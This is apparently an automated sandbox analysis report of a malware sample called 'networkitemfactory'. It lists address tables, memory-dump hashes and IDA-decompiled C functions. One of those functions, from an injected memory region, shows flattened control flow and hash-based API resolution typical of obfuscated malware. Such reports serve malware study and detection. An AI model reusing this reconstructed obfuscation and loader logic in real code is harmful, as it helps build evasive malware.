                                                                                                      0x00413ca6
                                                                                                      0x00413caa
                                                                                                      0x00413cc8
                                                                                                      0x00413cca
                                                                                                      0x00413ccd
                                                                                                      0x00413cd2
                                                                                                      0x00413cd6
                                                                                                      0x00413ce7
                                                                                                      0x00413ce9
                                                                                                      0x00413cec
                                                                                                      0x00413cee
                                                                                                      0x00413cf6
                                                                                                      0x00413cfc
                                                                                                      0x00413d07
                                                                                                      0x00413d0e
                                                                                                      0x00413d12
                                                                                                      0x00413d26
                                                                                                      0x00413d28
                                                                                                      0x00413d2b
                                                                                                      0x00413d2d
                                                                                                      0x00413de6
                                                                                                      0x00413dec
                                                                                                      0x00413d33
                                                                                                      0x00413d33
                                                                                                      0x00413d37
                                                                                                      0x00413d41
                                                                                                      0x00413d48
                                                                                                      0x00413d4a
                                                                                                      0x00413d4c
                                                                                                      0x00413d4c
                                                                                                      0x00413d4a
                                                                                                      0x00413d58
                                                                                                      0x00413d5e
                                                                                                      0x00413d65
                                                                                                      0x00413d6a
                                                                                                      0x00413d70
                                                                                                      0x00413d78
                                                                                                      0x00413d7c
                                                                                                      0x00413d7e
                                                                                                      0x00413d85
                                                                                                      0x00413d8f
                                                                                                      0x00413d96
                                                                                                      0x00413d9c
                                                                                                      0x00413da2
                                                                                                      0x00413da7
                                                                                                      0x00413dad
                                                                                                      0x00413db2
                                                                                                      0x00413db5
                                                                                                      0x00413db5
                                                                                                      0x00413d85
                                                                                                      0x00413dba
                                                                                                      0x00413dbe
                                                                                                      0x00413dbe
                                                                                                      0x00413d2d
                                                                                                      0x00413df3
                                                                                                      0x00413dfa
                                                                                                      0x00413dff
                                                                                                      0x00413cac
                                                                                                      0x00413cb1
                                                                                                      0x00413cb7
                                                                                                      0x00413cbc
                                                                                                      0x00413cbc
                                                                                                      0x00413e06
                                                                                                      0x00413e06
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                                                                      • String ID: p]C
                                                                                                      • API String ID: 790675137-1265664625
                                                                                                      • Opcode ID: 6d1495893d940ef6be95611885f58a632d76adb249db02c33a89ec36003c17cf
                                                                                                      • Instruction ID: 623bc6a35c898f006257f3d2ac9b328070ff02d3e3c726b5a2c0b95e6af6f13e
                                                                                                      • Opcode Fuzzy Hash: 6d1495893d940ef6be95611885f58a632d76adb249db02c33a89ec36003c17cf
                                                                                                      • Instruction Fuzzy Hash: D8410072904304AFDB10AFA6A8827DE77E0AF04319F10443FF905AA292DB7D96919B5D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00401100(long __ecx, struct HWND__* _a4, struct HINSTANCE__* _a8, CHAR* _a12) {
                                                                                                      				struct HWND__* _t16;
                                                                                                      				struct HMENU__* _t18;
                                                                                                      				void* _t23;
                                                                                                      				long _t28;
                                                                                                      				struct HINSTANCE__* _t30;
                                                                                                      				struct HDC__* _t31;
                                                                                                      
                                                                                                      				_t16 = _a4;
                                                                                                      				_t30 = _a8;
                                                                                                      				_t28 = __ecx;
                                                                                                      				 *((intOrPtr*)(__ecx)) = 0x42cc54;
                                                                                                      				 *((char*)(__ecx + 0x1c)) = 0;
                                                                                                      				 *(__ecx + 0x14) = _t16;
                                                                                                      				 *(_t28 + 0x18) = CreateWindowExA(0, _a12, 0, 0x90000000, 0, 0, 0x6f, 0x15, _t16, 0, _t30, 0);
                                                                                                      				_t18 = LoadMenuA(_t30, 0x6d);
                                                                                                      				 *(_t28 + 8) = _t18;
                                                                                                      				 *((intOrPtr*)(_t28 + 0xc)) = GetSubMenu(_t18, 0);
                                                                                                      				_t31 = GetDC( *(_t28 + 0x18));
                                                                                                      				 *(_t28 + 0x10) = CreateCompatibleDC(_t31);
                                                                                                      				ReleaseDC( *(_t28 + 0x18), _t31);
                                                                                                      				_t23 = LoadBitmapA(_t30, 0x85);
                                                                                                      				 *(_t28 + 4) = _t23;
                                                                                                      				SelectObject( *(_t28 + 0x10), _t23);
                                                                                                      				SetWindowLongA( *(_t28 + 0x18), 0xfffffffc, 0x401050);
                                                                                                      				SetWindowLongA( *(_t28 + 0x18), 0xffffffeb, _t28);
                                                                                                      				return _t28;
                                                                                                      			}









                                                                                                      0x00401103
                                                                                                      0x00401109
                                                                                                      0x0040110c
                                                                                                      0x00401126
                                                                                                      0x0040112e
                                                                                                      0x00401132
                                                                                                      0x0040113e
                                                                                                      0x00401141
                                                                                                      0x0040114a
                                                                                                      0x00401156
                                                                                                      0x0040115f
                                                                                                      0x0040116c
                                                                                                      0x0040116f
                                                                                                      0x0040117b
                                                                                                      0x00401185
                                                                                                      0x00401188
                                                                                                      0x0040119e
                                                                                                      0x004011a6
                                                                                                      0x004011ae

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateLoadLongMenu$BitmapCompatibleObjectReleaseSelect
                                                                                                      • String ID:
                                                                                                      • API String ID: 3316247204-0
                                                                                                      • Opcode ID: f11f789d58ba93abe2704281de4c3fe989fbbccd220e4df097f1c4c5a90b91e0
                                                                                                      • Instruction ID: 47f8015d6f8a27a6f2185c8b06d3858f74a4fe0b09e34247c124d55f7d547d32
                                                                                                      • Opcode Fuzzy Hash: f11f789d58ba93abe2704281de4c3fe989fbbccd220e4df097f1c4c5a90b91e0
                                                                                                      • Instruction Fuzzy Hash: AF111C71640310BFEB145F659C89F5B7F68EB49711F1045A5FA00AA2E5C6B5DC20CBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 85%
                                                                                                      			E00401C80(void* __ebx, void* __edx, void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                      				signed int _v8;
                                                                                                      				struct tagPAINTSTRUCT _v72;
                                                                                                      				void* __esi;
                                                                                                      				signed int _t19;
                                                                                                      				void* _t22;
                                                                                                      				void* _t25;
                                                                                                      				void* _t34;
                                                                                                      				void* _t38;
                                                                                                      				signed int _t42;
                                                                                                      				int _t53;
                                                                                                      				int _t58;
                                                                                                      				intOrPtr _t63;
                                                                                                      				struct HWND__* _t72;
                                                                                                      				signed int _t73;
                                                                                                      
                                                                                                      				_t70 = __edx;
                                                                                                      				_t19 =  *0x435040; // 0x35ed344a
                                                                                                      				_v8 = _t19 ^ _t73;
                                                                                                      				_t53 = _a8;
                                                                                                      				_t72 = _a4;
                                                                                                      				_t22 = _t53 - 2;
                                                                                                      				if(_t22 == 0) {
                                                                                                      					PostQuitMessage(0);
                                                                                                      					return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      				} else {
                                                                                                      					_t25 = _t22 - 0xd;
                                                                                                      					if(_t25 == 0) {
                                                                                                      						BeginPaint(_t72,  &_v72);
                                                                                                      						EndPaint(_t72,  &_v72);
                                                                                                      						return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      					} else {
                                                                                                      						if(_t25 == 0x102) {
                                                                                                      							_t58 = _a12;
                                                                                                      							_t34 = (_t58 & 0x0000ffff) - 0x69;
                                                                                                      							if(_t34 == 0) {
                                                                                                      								DestroyWindow(_t72);
                                                                                                      								return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      							} else {
                                                                                                      								_t38 = _t34 - 0x7f9d;
                                                                                                      								if(_t38 == 0) {
                                                                                                      									MessageBoxA(_t72, 0x436918, "About", 0x40);
                                                                                                      									return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      								} else {
                                                                                                      									_t42 = _t38 - 1;
                                                                                                      									if(_t42 == 0) {
                                                                                                      										_t63 =  *0x436844; // 0x0
                                                                                                      										 *0x4368ac = _t42 & 0xffffff00 |  *0x4368ac == 0x00000000;
                                                                                                      										L0040104B(_t63, (_t42 & 0xffffff00 |  *0x4368ac == 0x00000000) & 0x000000ff);
                                                                                                      										return E004023FF(__ebx, _v8 ^ _t73, __edx, __edi, _t72);
                                                                                                      									} else {
                                                                                                      										DefWindowProcA(_t72, 0x111, _t58, _a16);
                                                                                                      										return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						} else {
                                                                                                      							DefWindowProcA(_t72, _t53, _a12, _a16);
                                                                                                      							return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      						}
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}

















                                                                                                      0x00401c80
                                                                                                      0x00401c86
                                                                                                      0x00401c8d
                                                                                                      0x00401c90
                                                                                                      0x00401c96
                                                                                                      0x00401c99
                                                                                                      0x00401c9c
                                                                                                      0x00401da7
                                                                                                      0x00401dbd
                                                                                                      0x00401ca2
                                                                                                      0x00401ca2
                                                                                                      0x00401ca5
                                                                                                      0x00401d81
                                                                                                      0x00401d8c
                                                                                                      0x00401da2
                                                                                                      0x00401cab
                                                                                                      0x00401cb0
                                                                                                      0x00401cd1
                                                                                                      0x00401cd7
                                                                                                      0x00401cda
                                                                                                      0x00401d63
                                                                                                      0x00401d79
                                                                                                      0x00401ce0
                                                                                                      0x00401ce0
                                                                                                      0x00401ce5
                                                                                                      0x00401d49
                                                                                                      0x00401d5f
                                                                                                      0x00401ce7
                                                                                                      0x00401ce7
                                                                                                      0x00401ce8
                                                                                                      0x00401d12
                                                                                                      0x00401d1b
                                                                                                      0x00401d24
                                                                                                      0x00401d39
                                                                                                      0x00401cea
                                                                                                      0x00401cf4
                                                                                                      0x00401d08
                                                                                                      0x00401d08
                                                                                                      0x00401ce8
                                                                                                      0x00401ce5
                                                                                                      0x00401cb2
                                                                                                      0x00401cba
                                                                                                      0x00401cce
                                                                                                      0x00401cce
                                                                                                      0x00401cb0
                                                                                                      0x00401ca5

                                                                                                      APIs
                                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00401CBA
                                                                                                      • DefWindowProcA.USER32(?,00000111,?,?), ref: 00401CF4
                                                                                                      • BeginPaint.USER32(?,?), ref: 00401D81
                                                                                                      • EndPaint.USER32(?,?), ref: 00401D8C
                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401DA7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                      • String ID: About
                                                                                                      • API String ID: 3181456275-1949634023
                                                                                                      • Opcode ID: 5a5cfd39e6820e542c64a1b125ed650101f42d542ecb90d47b2c7f2a410015d5
                                                                                                      • Instruction ID: 88c6f8a955abea856bd48f6bc5af4ea1602800acc5508de23de6365d246a8e04
                                                                                                      • Opcode Fuzzy Hash: 5a5cfd39e6820e542c64a1b125ed650101f42d542ecb90d47b2c7f2a410015d5
                                                                                                      • Instruction Fuzzy Hash: BB31B63161000D6BDB14EF79AD0AABF77A9EF09300F00456BFC02A65D2CAB95E10A799
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 84%
                                                                                                      			E00413496(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                      				void* _t10;
                                                                                                      				signed int _t12;
                                                                                                      				intOrPtr* _t16;
                                                                                                      				intOrPtr* _t31;
                                                                                                      				void* _t32;
                                                                                                      
                                                                                                      				_push(8);
                                                                                                      				_push(0x434730);
                                                                                                      				_t10 = E00406830(__ebx, __edi, __esi);
                                                                                                      				_t31 =  *((intOrPtr*)(_t32 + 8));
                                                                                                      				if(_t31 != 0) {
                                                                                                      					_t12 = E00406D5B(0xd);
                                                                                                      					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                                                                                                      					if( *((intOrPtr*)(_t31 + 4)) != 0) {
                                                                                                      						asm("lock xadd [ecx], eax");
                                                                                                      						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0x435570) {
                                                                                                      							E00402CB3( *((intOrPtr*)(_t31 + 4)));
                                                                                                      						}
                                                                                                      					}
                                                                                                      					 *(_t32 - 4) = 0xfffffffe;
                                                                                                      					E00413ABB();
                                                                                                      					if( *_t31 != 0) {
                                                                                                      						E00406D5B(0xc);
                                                                                                      						 *(_t32 - 4) = 1;
                                                                                                      						E0040E7B6( *_t31);
                                                                                                      						_t16 =  *_t31;
                                                                                                      						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0x4359f8) {
                                                                                                      							E0040E65C(_t16);
                                                                                                      						}
                                                                                                      						 *(_t32 - 4) = 0xfffffffe;
                                                                                                      						E00413AC7();
                                                                                                      					}
                                                                                                      					_t10 = E00402CB3(_t31);
                                                                                                      				}
                                                                                                      				return E00406875(_t10);
                                                                                                      			}








                                                                                                      0x00413a19
                                                                                                      0x00413a1b
                                                                                                      0x00413a20
                                                                                                      0x00413a25
                                                                                                      0x00413a2a
                                                                                                      0x00413a32
                                                                                                      0x00413a38
                                                                                                      0x00413a41
                                                                                                      0x00413a46
                                                                                                      0x00413a4a
                                                                                                      0x00413a58
                                                                                                      0x00413a5d
                                                                                                      0x00413a4a
                                                                                                      0x00413a5e
                                                                                                      0x00413a65
                                                                                                      0x00413a6d
                                                                                                      0x00413a71
                                                                                                      0x00413a77
                                                                                                      0x00413a80
                                                                                                      0x00413a86
                                                                                                      0x00413a8a
                                                                                                      0x00413a99
                                                                                                      0x00413a9e
                                                                                                      0x00413a9f
                                                                                                      0x00413aa6
                                                                                                      0x00413aa6
                                                                                                      0x00413aac
                                                                                                      0x00413ab1
                                                                                                      0x00413ab7

                                                                                                      APIs
                                                                                                      • __lock.LIBCMT ref: 00413A32
                                                                                                        • Part of subcall function 00406D5B: __mtinitlocknum.LIBCMT ref: 00406D6D
                                                                                                        • Part of subcall function 00406D5B: __amsg_exit.LIBCMT ref: 00406D79
                                                                                                        • Part of subcall function 00406D5B: EnterCriticalSection.KERNEL32(00000000,?,004042F4,0000000D), ref: 00406D86
                                                                                                      • _free.LIBCMT ref: 00413A58
                                                                                                        • Part of subcall function 00402CB3: HeapFree.KERNEL32(00000000,00000000,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CC7
                                                                                                        • Part of subcall function 00402CB3: GetLastError.KERNEL32(xuC,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CD9
                                                                                                      • __lock.LIBCMT ref: 00413A71
                                                                                                      • ___removelocaleref.LIBCMT ref: 00413A80
                                                                                                      • ___freetlocinfo.LIBCMT ref: 00413A99
                                                                                                      • _free.LIBCMT ref: 00413AAC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                      • String ID: pUC
                                                                                                      • API String ID: 626533743-2208893049
                                                                                                      • Opcode ID: c2db22ab7447c57abcc7cacf5659124182d64d1af5b66121e739107cc329366f
                                                                                                      • Instruction ID: c3db13d6e87042e8d3d9c327ba538853f5f3e6b802cb2b63995fb45b47053acf
                                                                                                      • Opcode Fuzzy Hash: c2db22ab7447c57abcc7cacf5659124182d64d1af5b66121e739107cc329366f
                                                                                                      • Instruction Fuzzy Hash: AB01A131501700AADB34AF669506B9E73A05F0076AF20866FE4E9762D1CB7D9AC1C68D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 020914DB
                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 02091507
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.518992835.0000000002091000.00000020.00000001.sdmp, Offset: 02091000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_2091000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1452528299-0
                                                                                                      • Opcode ID: fb8b03cb4389705fbb06cf7aa6833ff827dc3988d23ad7bb0b9e9d6eb927364b
                                                                                                      • Instruction ID: 7267bec11654998f4452098b03387ff83802b7a9035422db4525bc223226b8ac
                                                                                                      • Opcode Fuzzy Hash: fb8b03cb4389705fbb06cf7aa6833ff827dc3988d23ad7bb0b9e9d6eb927364b
                                                                                                      • Instruction Fuzzy Hash: F371C674E4420AEFDB04DF94C590BADF7B2BF48304F248599D51AAB391D734AA41EF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 69%
                                                                                                      			E020B9FD0(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                      				char _v524;
                                                                                                      				char _v1044;
                                                                                                      				intOrPtr _v1052;
                                                                                                      				char _v1056;
                                                                                                      				char _v1060;
                                                                                                      				intOrPtr* _v1064;
                                                                                                      				intOrPtr _v1068;
                                                                                                      				char _v1072;
                                                                                                      				intOrPtr _v1076;
                                                                                                      				intOrPtr _v1080;
                                                                                                      				intOrPtr _v1084;
                                                                                                      				intOrPtr _v1088;
                                                                                                      				intOrPtr _v1092;
                                                                                                      				intOrPtr _v1108;
                                                                                                      				void* _v1112;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t43;
                                                                                                      				signed int _t47;
                                                                                                      				intOrPtr* _t50;
                                                                                                      				intOrPtr* _t52;
                                                                                                      				intOrPtr* _t56;
                                                                                                      				intOrPtr* _t58;
                                                                                                      				intOrPtr* _t63;
                                                                                                      				intOrPtr* _t65;
                                                                                                      				intOrPtr* _t66;
                                                                                                      				signed int _t69;
                                                                                                      				intOrPtr* _t73;
                                                                                                      				signed int _t74;
                                                                                                      				signed int _t80;
                                                                                                      				intOrPtr* _t92;
                                                                                                      				intOrPtr _t95;
                                                                                                      				intOrPtr* _t97;
                                                                                                      				intOrPtr* _t101;
                                                                                                      				intOrPtr* _t102;
                                                                                                      				intOrPtr _t115;
                                                                                                      				intOrPtr _t158;
                                                                                                      				intOrPtr* _t167;
                                                                                                      				char _t168;
                                                                                                      				void* _t169;
                                                                                                      				intOrPtr _t170;
                                                                                                      				intOrPtr _t171;
                                                                                                      				intOrPtr* _t172;
                                                                                                      				void* _t174;
                                                                                                      				void* _t175;
                                                                                                      				void* _t176;
                                                                                                      				intOrPtr* _t177;
                                                                                                      				intOrPtr* _t178;
                                                                                                      				void* _t179;
                                                                                                      				void* _t180;
                                                                                                      				void* _t181;
                                                                                                      
                                                                                                      				_t179 =  &_v1084;
                                                                                                      				_v1080 = __edx;
                                                                                                      				_t43 = 0x120bbb7e;
                                                                                                      				_v1076 = __ecx;
                                                                                                      				while(1) {
                                                                                                      					L1:
                                                                                                      					_t177 = _v1064;
                                                                                                      					_t101 = _v1060;
                                                                                                      					while(1) {
                                                                                                      						_t168 = _v1072;
                                                                                                      						do {
                                                                                                      							while(1) {
                                                                                                      								L3:
                                                                                                      								_t180 = _t43 - 0x120bbb7e;
                                                                                                      								if(_t180 > 0) {
                                                                                                      									break;
                                                                                                      								}
                                                                                                      								if(_t180 == 0) {
                                                                                                      									_t63 =  *0x20bddc8;
                                                                                                      									__eflags = _t63;
                                                                                                      									if(_t63 == 0) {
                                                                                                      										_t63 = E020B3DD0(_t101, E020B3E70(0xbb51e2dc), 0x298e8809, _t177);
                                                                                                      										 *0x20bddc8 = _t63;
                                                                                                      									}
                                                                                                      									_t169 =  *_t63();
                                                                                                      									_t65 =  *0x20bdcf0;
                                                                                                      									__eflags = _t65;
                                                                                                      									if(_t65 == 0) {
                                                                                                      										_t65 = E020B3DD0(_t101, E020B3E70(0xbb51e2dc), 0xc9d236a5, _t177);
                                                                                                      										 *0x20bdcf0 = _t65;
                                                                                                      									}
                                                                                                      									_t66 =  *_t65(_t169, 8, 0x54);
                                                                                                      									_t101 = _t66;
                                                                                                      									_v1072 = _t101;
                                                                                                      									__eflags = _t101;
                                                                                                      									if(_t101 == 0) {
                                                                                                      										return _t66;
                                                                                                      									} else {
                                                                                                      										_t43 = 0x327da77b;
                                                                                                      										while(1) {
                                                                                                      											_t168 = _v1072;
                                                                                                      											goto L3;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								} else {
                                                                                                      									_t181 = _t43 - 0x50215d6;
                                                                                                      									if(_t181 > 0) {
                                                                                                      										__eflags = _t43 - 0xc08f76b;
                                                                                                      										if(_t43 == 0xc08f76b) {
                                                                                                      											_t69 = E020BB380( &_v1056,  &_v1072, _t177);
                                                                                                      											asm("sbb eax, eax");
                                                                                                      											_t43 = ( ~_t69 & 0x3071774a) + 0x1ccce1b;
                                                                                                      											while(1) {
                                                                                                      												_t168 = _v1072;
                                                                                                      												goto L3;
                                                                                                      											}
                                                                                                      										} else {
                                                                                                      											__eflags = _t43 - 0xfc8d800;
                                                                                                      											if(_t43 != 0xfc8d800) {
                                                                                                      												goto L50;
                                                                                                      											} else {
                                                                                                      												E020B4180(_t101, _t168);
                                                                                                      												_t43 = 0x1ccce1b;
                                                                                                      												continue;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										if(_t181 == 0) {
                                                                                                      											_t170 =  *0x20be368; // 0x54d130
                                                                                                      											_t73 =  *0x20bdbe8;
                                                                                                      											_t171 = _t170 + 0x14;
                                                                                                      											_v1052 = _t171;
                                                                                                      											__eflags = _t73;
                                                                                                      											if(_t73 == 0) {
                                                                                                      												_t73 = E020B3DD0(_t101, E020B3E70(0xbb51e2dc), 0x7293aecb, _t177);
                                                                                                      												 *0x20bdbe8 = _t73;
                                                                                                      											}
                                                                                                      											_t74 =  *_t73(_t171);
                                                                                                      											_t172 =  *0x20bdef0;
                                                                                                      											_v1052 = 2 + _t74 * 2;
                                                                                                      											__eflags = _t172;
                                                                                                      											if(_t172 == 0) {
                                                                                                      												_t172 = E020B3DD0(_t101, E020B3E70(0xbb51e2dc), 0x3a73900, _t177);
                                                                                                      												 *0x20bdef0 = _t172;
                                                                                                      											}
                                                                                                      											_t178 = _t172;
                                                                                                      											__eflags = _t172;
                                                                                                      											if(_t172 == 0) {
                                                                                                      												_t172 = E020B3DD0(_t101, E020B3E70(0xbb51e2dc), 0x3a73900, _t178);
                                                                                                      												 *0x20bdef0 = _t172;
                                                                                                      											}
                                                                                                      											_t102 = _t172;
                                                                                                      											__eflags = _t172;
                                                                                                      											if(_t172 == 0) {
                                                                                                      												 *0x20bdef0 = E020B3DD0(_t102, E020B3E70(0xbb51e2dc), 0x3a73900, _t178);
                                                                                                      											}
                                                                                                      											_t167 =  *0x20bddc0; // 0x0
                                                                                                      											__eflags = _t167;
                                                                                                      											if(_t167 == 0) {
                                                                                                      												_t167 = E020B3DD0(_t102, E020B3E70(0xbb51e2dc), 0x93e1a21f, _t178);
                                                                                                      												 *0x20bddc0 = _t167;
                                                                                                      											}
                                                                                                      											_t80 =  *_t167(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(),  &_v1060, 0x100000, 1, 0);
                                                                                                      											_t115 = _v1108;
                                                                                                      											asm("sbb eax, eax");
                                                                                                      											_t43 = ( ~_t80 & 0xe7c24535) + 0x2446b236;
                                                                                                      											goto L1;
                                                                                                      										} else {
                                                                                                      											if(_t43 == 0x1ccce1b) {
                                                                                                      												_t92 =  *0x20bde38;
                                                                                                      												__eflags = _t92;
                                                                                                      												if(_t92 == 0) {
                                                                                                      													_t92 = E020B3DD0(_t101, E020B3E70(0xbb51e2dc), 0x76fc23ac, _t177);
                                                                                                      													 *0x20bde38 = _t92;
                                                                                                      												}
                                                                                                      												 *_t92(_v1056);
                                                                                                      												_t115 = _v1080;
                                                                                                      												_t43 = 0x35541bc;
                                                                                                      												_t158 = _v1084;
                                                                                                      												continue;
                                                                                                      											} else {
                                                                                                      												if(_t43 == 0x35541bc) {
                                                                                                      													 *((intOrPtr*)(_t101 + 0x4c)) = _t115;
                                                                                                      													_t95 =  *0x20be358; // 0x0
                                                                                                      													 *((intOrPtr*)(_t101 + 0x18)) = _t95;
                                                                                                      													 *0x20be358 = _t101;
                                                                                                      													return _t95;
                                                                                                      												} else {
                                                                                                      													if(_t43 != 0x4cec42f) {
                                                                                                      														goto L50;
                                                                                                      													} else {
                                                                                                      														_t174 = E020B3460(0x20bdb60);
                                                                                                      														_t97 =  *0x20bdf10;
                                                                                                      														if(_t97 == 0) {
                                                                                                      															_t97 = E020B3DD0(_t101, E020B3E70(0xe60124ba), 0xec538b3a, _t177);
                                                                                                      															 *0x20bdf10 = _t97;
                                                                                                      														}
                                                                                                      														 *_t97( &_v1044, 0x104, _t174,  &_v524, _t177);
                                                                                                      														_t179 = _t179 + 0x14;
                                                                                                      														E020B3400(_t174);
                                                                                                      														_t115 = _v1076;
                                                                                                      														_t43 = 0x2a25fc8b;
                                                                                                      														_t158 = _v1080;
                                                                                                      														while(1) {
                                                                                                      															_t168 = _v1072;
                                                                                                      															goto L3;
                                                                                                      														}
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      								L60:
                                                                                                      							}
                                                                                                      							__eflags = _t43 - 0x303d5fe9;
                                                                                                      							if(__eflags > 0) {
                                                                                                      								__eflags = _t43 - 0x323e4565;
                                                                                                      								if(_t43 == 0x323e4565) {
                                                                                                      									_t177 = E020B1150(_v1068);
                                                                                                      									__eflags = _t177;
                                                                                                      									_v1064 = _t177;
                                                                                                      									_t43 =  !=  ? 0x4cec42f : 0xfc8d800;
                                                                                                      									goto L3;
                                                                                                      								} else {
                                                                                                      									__eflags = _t43 - 0x327da77b;
                                                                                                      									if(_t43 != 0x327da77b) {
                                                                                                      										goto L50;
                                                                                                      									} else {
                                                                                                      										_t47 = E020BAB90(_t115, _t158,  &_v524);
                                                                                                      										_t115 = _v1076;
                                                                                                      										_t179 = _t179 + 4;
                                                                                                      										_t158 = _v1080;
                                                                                                      										asm("sbb eax, eax");
                                                                                                      										_t43 = ( ~_t47 & 0xe0bb63a0) + 0x2446b236;
                                                                                                      										goto L3;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(__eflags == 0) {
                                                                                                      									_t50 =  *0x20bddc8;
                                                                                                      									__eflags = _t50;
                                                                                                      									if(_t50 == 0) {
                                                                                                      										_t50 = E020B3DD0(_t101, E020B3E70(0xbb51e2dc), 0x298e8809, _t177);
                                                                                                      										 *0x20bddc8 = _t50;
                                                                                                      									}
                                                                                                      									_t175 =  *_t50();
                                                                                                      									_t52 =  *0x20bdbec;
                                                                                                      									__eflags = _t52;
                                                                                                      									if(_t52 == 0) {
                                                                                                      										_t52 = E020B3DD0(_t101, E020B3E70(0xbb51e2dc), 0x632f374, _t177);
